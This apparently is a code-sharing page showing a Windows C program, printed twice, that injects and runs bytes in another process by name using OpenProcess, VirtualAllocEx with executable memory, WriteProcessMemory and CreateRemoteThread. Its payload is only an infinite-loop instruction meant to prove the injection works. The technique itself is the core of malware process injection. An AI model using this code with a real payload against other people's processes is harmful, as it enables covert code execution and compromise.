c0d3inj3cT · December 28, 2015 13:49
diff --git a/processinjector.c b/processinjector.c
 /*
 This code can be used to test the code injection in a remote process
 The CPU usage will be at its peak after running this code
 as a result of injecting the bytes, 0xeb, 0xfe into the remote process
 If you get a high CPU usage for the remote process, you have successfully
 injected the code. You can also confirm it by attaching a debugger to the
 remote process and setting a  breakpoint at the return address of VirtualAllocEx()

 c0d3inj3cT
 */

 #include <windows.h>
 #include <stdio.h>
 #include <TlHelp32.h>

 int main(int argc, char **argv)
 {
 HANDLE psnap;
 HANDLE process;
 void *address;
 char code[] = {0xeb, 0xfe, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
 PROCESSENTRY32 pe;
 int pid=0;
 int tid;
 char *pname=argv[1];
 pe.dwSize = sizeof(PROCESSENTRY32);

 if(argc != 2)
 {
 	printf("usage: processinjector.exe <processname>\n");
 	exit(0);
 }

 psnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

 printf("handle of process snapshot is: %x\n", psnap);

 if(!Process32First(psnap, &pe))
 {
 	printf("There was an error in retrieving the process information\n");
 	exit(0);
 }

 if(strcmp(pname, pe.szExeFile) == 0)
 {
 	printf("process id is: %x\n", pe.th32ProcessID);
 	pid = pe.th32ProcessID;
 }

 while(Process32Next(psnap, &pe))
 {
 	if(strcmp(pname, pe.szExeFile) == 0)
 	{
 		printf("process id is: %x\n", pe.th32ProcessID);
 		pid = pe.th32ProcessID;
 		break;
 	}
 }

 if(pid==0)
 {
 	printf("process is not running\n");
 	exit(0);
 }

 process=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_READ|PROCESS_VM_WRITE|PROCESS_QUERY_INFORMATION, 0, pid);

 address=VirtualAllocEx(process, NULL, 0x10, 0x1000, 0x40);

 printf("Allocated memory in remote process at address: %p\n",address);

 WriteProcessMemory(process, address, code, sizeof(code), NULL);

 printf("code written to memory\n");

 CreateRemoteThread(process, NULL, 0, address, NULL, 0, &tid);

 printf("Remote Thread with id: %x created successfully\n", tid);

 return 0;
 }
	/*
	This code can be used to test the code injection in a remote process
	The CPU usage will be at its peak after running this code
	as a result of injecting the bytes, 0xeb, 0xfe into the remote process
	If you get a high CPU usage for the remote process, you have successfully
	injected the code. You can also confirm it by attaching a debugger to the
	remote process and setting a breakpoint at the return address of VirtualAllocEx()

	c0d3inj3cT
	*/

	#include <windows.h>
	#include <stdio.h>
	#include <TlHelp32.h>

	int main(int argc, char **argv)
	{
	HANDLE psnap;
	HANDLE process;
	void *address;
	char code[] = {0xeb, 0xfe, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
	PROCESSENTRY32 pe;
	int pid=0;
	int tid;
	char *pname=argv[1];
	pe.dwSize = sizeof(PROCESSENTRY32);

	if(argc != 2)
	{
	printf("usage: processinjector.exe <processname>\n");
	exit(0);
	}

	psnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

	printf("handle of process snapshot is: %x\n", psnap);

	if(!Process32First(psnap, &pe))
	{
	printf("There was an error in retrieving the process information\n");
	exit(0);
	}

	if(strcmp(pname, pe.szExeFile) == 0)
	{
	printf("process id is: %x\n", pe.th32ProcessID);
	pid = pe.th32ProcessID;
	}

	while(Process32Next(psnap, &pe))
	{
	if(strcmp(pname, pe.szExeFile) == 0)
	{
	printf("process id is: %x\n", pe.th32ProcessID);
	pid = pe.th32ProcessID;
	break;
	}
	}

	if(pid==0)
	{
	printf("process is not running\n");
	exit(0);
	}

	process=OpenProcess(PROCESS_CREATE_THREAD\|PROCESS_VM_OPERATION\|PROCESS_VM_READ\|PROCESS_VM_WRITE\|PROCESS_QUERY_INFORMATION, 0, pid);

	address=VirtualAllocEx(process, NULL, 0x10, 0x1000, 0x40);

	printf("Allocated memory in remote process at address: %p\n",address);

	WriteProcessMemory(process, address, code, sizeof(code), NULL);

	printf("code written to memory\n");

	CreateRemoteThread(process, NULL, 0, address, NULL, 0, &tid);

	printf("Remote Thread with id: %x created successfully\n", tid);

	return 0;
	}